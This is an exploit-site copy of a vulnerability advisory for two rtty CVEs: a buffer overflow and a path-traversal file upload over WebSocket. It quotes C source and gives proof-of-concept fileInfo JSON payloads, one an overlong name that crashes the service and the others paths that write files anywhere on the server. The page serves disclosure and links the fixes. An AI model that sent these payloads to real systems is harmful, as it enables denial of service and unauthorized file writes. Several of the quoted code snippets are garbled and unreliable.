Share
## https://sploitus.com/exploit?id=257FED44-A54B-5842-A9EF-409B92DE6D91
# CVE-2025-56708&CVE-2025-56709  
## ใ€CVE-2025-56709ใ€‘savepath Buffer Overflow  
### Vulnerability Description  
In the line:  
`rtty total_size = ctx->remain_size = buffer_pull_u32be(info);`  

The code then proceeds as follows:  
```c
ment = find_mount_point(savepath);  
if (ment) {  
    uint64_t avail;  

    if (!strcmp(ment->mnt_type, "ramfs")) {  
        struct sysinfo si;  

        if (sysinfo(&si)) {  
            log_err("Download file failed: โ€˜%sโ€™\n", strerror(errno));  
            goto check_space_fail;  
        }  
    }  
    else if (!statvfs(ment->mnt_dir, &sfs)) {  
        avail = sfs.f_bavail * sfs.f_frsize;  
    }  
    else {  
        log_err("Download file failed: โ€˜%sโ€™\n", strerror(errno));  
        goto check_space_fail;  
    }  
} else {  
    log_err("Download file failed: โ€˜%sโ€™ not found\n", savepath);  
    goto check_space_fail;ใ€2ใ€‘  
}  
```  
The code also checks whether there is enough space to store the downloaded file:  
```c
buffer_pull(info, name, len - 4);  
if (!access(savepath, F_OK)) {  
    send_file_control_msg(ctx->ctlfd, RTTY_FILE_MSG_ERR_EXIST, NULL, 0);  
    log_err("The file โ€˜%sโ€™ already exists\n", name);  
    goto open_fail;  
}  
```  
If the file cannot be opened, an error message is sent.  
```c
fd = open(savepath, O_WRONLY | O_TRUNC | O_CREAT, 0644);  
if (fd == NULL) {  
    log_err("Failed to create the file โ€˜%sโ€™: %s\n", name, strerror(errno));  
    goto open_fail;  
}  
```  
Finally, the code logs information about the download process:  
```c
log_info("Downloaded file: %s, size: %u\n", savepath, ctx->total_size);  
```

### Close File
```c
if (fd != NULL) {
    close(fd);
    else
        ctx->fd = fd;

    memcpy(buf, &ctx->total_size, 4);
    strcpy(buf + 4, name);

    send_file_control_msg(ctx->ctlfd, RTTY_FILE_MSG_INFO, buf, 4 + strlen(name));

    return;
}

check_space_fail:
    send_file_control_msg(ctx->ctlfd, RTTY_FILE_MSG_NO_SPACE, NULL, 0);
    buffer_pull(info, name, len - 4);
}
```

### Vulnerability POC
- Continuously sending data using WebSocket can cause the service to crash (possibly leading to RCE).
```json
{"type":"fileInfo","name":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","size":50}
```

### Vulnerability Fixes
https://github.com/zhaojh329/rtty/issues/139

## CVE-2025-56708: Unauthorized File Upload
### Vulnerability Overview
The rtty <=v9.0.0 version has a directory traversal vulnerability. In the interaction protocol, there is a logical vulnerability in the fileinfo method. Attackers can hijack the WebSocket and call the fileinfo method, allowing them to upload files to any path in the system without requiring user login.

### Vulnerability POC
- Hijacking the WebSocket process and using the fileInfo method to upload files to any directory in the system without user login.
- Specifying the mount directory
```json
{"type":"fileInfo","name":"home/xk/xxx/xxx/fuck1","size":50}
```

- Specifying the file
```json
{"type":"fileInfo","name":"home/xk/xxx/xxxx/test/rtty/rtty/build/src/hello1","size":50}
```

- Generating files on the server side
![Vulnerability diagram](image.png)

### Vulnerability Fixes
https://github.com/zhaojh329/rtty/issues/140

[source-iocs-preserved const=RTTY_FILE_MSG_ERR]